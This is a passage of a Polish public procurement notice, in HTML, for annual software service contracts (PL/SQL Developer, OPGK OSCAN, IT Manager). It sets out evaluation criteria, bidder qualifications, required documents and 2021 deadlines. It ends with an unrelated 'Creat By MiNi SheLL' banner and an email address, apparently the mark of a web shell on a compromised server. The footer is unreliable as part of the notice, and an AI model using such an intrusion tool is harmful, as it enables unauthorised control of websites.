stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 3<br/>PL/SQL Developer Annual Service Contract Annual Service Contract dla PL/SQL Developer. Okres od 02.11.2021 do 01.11.2022.<br/>Wykonawca musi dostarczyć oprogramowanie i kody aktywacyjne Zamawiającemu dla Annual Service Contract dla PL/SQL Developer 5 users wraz z niezbędnymi do korzystania licencjami. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 813,01 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72591000-4 - Rozszerzanie umów serwisowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-11-02 do 2022-11-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa bezpłatna asysta techniczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy na dzień składania ofert: <br/>1) nie podlegają wykluczeniu; <br/>2) spełniają następujące warunki dotyczące: <br/>1.1.	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w ww. zakresie.<br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w ww. zakresie.<br/>1.3.	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w ww. zakresie. <br/>1.4.	zdolności technicznej lub zawodowej: <br/>Zamawiający uzna ww. warunek za spełniony, jeżeli: <br/>1.4.1) Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 usługę polegającą na świadczeniu usługi serwisowej do oprogramowań informatycznych i o wartości brutto dla: zadania częściowego nr 1 co najmniej 20000zł., zadania częściowego nr 2 co najmniej 3000zł., zadania częściowego nr 3 co najmniej 500zł. wraz z podaniem ich wartości, przedmiotu - uwzględniającego wymagania określone w Rozdziale VI SWZ, dat wykonania i podmiotów, na rzecz których dostawy/usługi zostały wykonane lub są wykonywane należycie wraz z załączeniem dowodów określających, czy dostawy/usługi te zostały wykonane lub są wykonywane należycie<br/>1.4.2) W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; OPGK OSCAN lub równoważny.<br/>1.4.3) W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; IT Manager lub równoważny.<br/>1.4.4) W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; producenta oprogramowania Allround Automations dla PL/SQL Developer Annual Service Contract. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt 4 ustawy Pzp – jeśli Wykonawca nie wskaże w Oświadczeniu, stanowiącym Załącznik nr 3 do SWZ, w którym Zamawiający może samodzielnie znaleźć przedmiotowy dokument dotyczący Wykonawcy;<br/>2) dokumentu dotyczącego podmiotu udostępniającego zasoby, o którym mowa w 8.2 ppkt pkt 1) powyżej, w celu wykazania braku istnienia wobec niego podstaw wykluczenia, w zakresie w jakim Wykonawca powołuje się na jego zasoby – jeżeli Wykonawca polega na zasobach podmiotu udostępniającego zasoby,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw/usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 usługę polegającą na świadczeniu usługi serwisowej do oprogramowań informatycznych i o wartości brutto dla: zadania częściowego nr 1 co najmniej 20000zł., zadania częściowego nr 2 co najmniej 3000zł., zadania częściowego nr 3 co najmniej 500zł. wraz z podaniem ich wartości, przedmiotu - uwzględniającego wymagania określone w Rozdziale VI SWZ, dat wykonania i podmiotów, na rzecz których dostawy/usługi zostały wykonane lub są wykonywane należycie wraz z załączeniem dowodów określających, czy dostawy/usługi te zostały wykonane lub są wykonywane należycie.<br/>Dowodami potwierdzającymi czy dostawy/usługi zostały wykonane lub są wykonywane należycie są:<br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy/usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, <br/>b) oświadczenie Wykonawcy – jeżeli z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o których mowa w pkt 8.2 2) lit a) powyżej. Jeśli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania dokumentów, o którym mowa powyżej (przedstawić pisemne uzasadnienie). W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zadanie częściowe nr 1.<br/>W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; OPGK OSCAN lub równoważny.<br/>Zadanie częściowe nr 2<br/>W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; oprogramowania; IT Manager lub równoważny.<br/>Zadanie częściowe nr 3.<br/>W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; producenta oprogramowania Allround Automations dla PL/SQL Developer Annual Service Contract lub równoważny. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zadanie częściowe nr 1.<br/>W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania OPGK OSCAN potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.8., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ.<br/>Zadanie częściowe nr 2.<br/>W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania; IT Manager potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.9., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ.<br/>Zadanie częściowe nr 3<br/>W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania; PL/SQL Developer Annual Service Contract potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.10., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta Wykonawcy musi zawierać: <br/>1.1.	Formularz ofertowy – podpisany zgodnie z zasadami, o których mowa w ust. 11.5.-11.10 poniżej i wypełniony zgodnie ze wzorem stanowiącym Załącznik nr 2 do SWZ; <br/>1.2.	Oświadczenie, o którym mowa w Rozdziale VIII ust. 8.1.1 li. a) SWZ, podpisane zgodnie z zasadami, o których mowa w ust. 11.5.- 11.10 poniżej i wypełnione według wzoru stanowiącego Załącznik nr 3 do SWZ; <br/>1.3.	Pełnomocnictwo do reprezentowania Wykonawcy (Wykonawców występujących wspólnie) - o ile ofertę składa pełnomocnik, w formie zgodnej z zasadami, o których mowa w ust.11. 5- 11.10 SWZ <br/>1.4.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale VIII ust. 8.1. ppkt 8.2) SWZ - jeżeli Wykonawca polega na zasobach lub sytuacji podmiotu udostępniającego zasoby, podpisane zgodnie z zasadami, o których mowa w ust. 11.5.-11.10 SWZ. <br/>1.5.	Uzasadnienie do zastrzeżenia informacji znajdujących się w Ofercie stanowiących tajemnicę przedsiębiorstwa – o ile dotyczy;<br/>Zadanie częściowe nr 1<br/>1.6.	W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; OPGK OSCAN lub równoważny.<br/>1.7.	W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania OPGK OSCAN potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.8., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ.<br/>Zadanie częściowe nr 2<br/>1.8.	W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; oprogramowania; IT Manager lub równoważny.<br/>1.9.	W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania; IT Manager potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.9., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ.<br/>Zadanie częściowe nr 3<br/>1.10.	W celu potwierdzenia , ze oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego, do oferty należy załączyć przedmiotowy środek dowodowy: oświadczenie i/lub umowę partnerską lub inny dokument na sprzedaż i obsługę oprogramowania; producenta oprogramowania Allround Automations dla PL/SQL Developer Annual Service Contract lub równoważny.<br/>1.11.	W przypadku zaoferowania dostaw/usług równoważnych dowód (oświadczenie) wystawione przez producenta oprogramowania; PL/SQL Developer Annual Service Contract potwierdzający zgodność zaoferowanych usług/dostaw równoważnych z produktem wymienionym w SWZ na potwierdzenie warunku określonego w Rozdziale IV. ust. 4.10., podpisane zgodnie z zasadami, o których mowa w ust. 11.6.- 11.11 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w ust. 6.1 pkt 2) SWZ musi spełniać, co najmniej jeden Wykonawca samodzielnie lub wszyscy Wykonawcy łącznie, natomiast warunek określony w ust. 6.1 pkt 1) SWZ musi spełniać każdy z Wykonawców.<br/>W odniesieniu do wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych Wykonawców, gdyż nie jest to uzasadnione charakterem zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zadanie częściowe nr 1<br/>1.	Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Wykonawca zobowiązuje się dostarczać do siedziby Zamawiającego nośniki, na których zapisane będą aktualizacje Oprogramowania, nowe wersje Oprogramowania i udoskonalenia do wersji bieżących Oprogramowania wraz z dokumentacją techniczną zawierającą opis wykonanych zmian i aktualnej dokumentacji użytkownika i administratora, zwane dalej Aktualizacją Oprogramowania, bądź umożliwić ich pobranie ze strony internetowej Producenta Oprogramowania, w terminie do 30 dni od chwili pojawienia się aktualizacji, nowej wersji lub udoskonalenia Oprogramowania.<br/>3.	Wykonawca zobowiązuje się do przekazania Zamawiającemu pełnej dokumentacji technicznej w przypadku zmian Oprogramowania, które to zmiany mogą mieć wpływ na integrację Oprogramowania z systemami używanymi przez Zamawiającego, w szczególności z systemem do prowadzenia ewidencji gruntów, portalem SIT i budynków oraz rozwiązaniem automatyzującym skanowanie aktów notarialnych.<br/>Zadanie częściowe nr 2 i nr 3 <br/>1.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-19 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/ Adres skrytki Zamawiającego /LOG/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-19 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com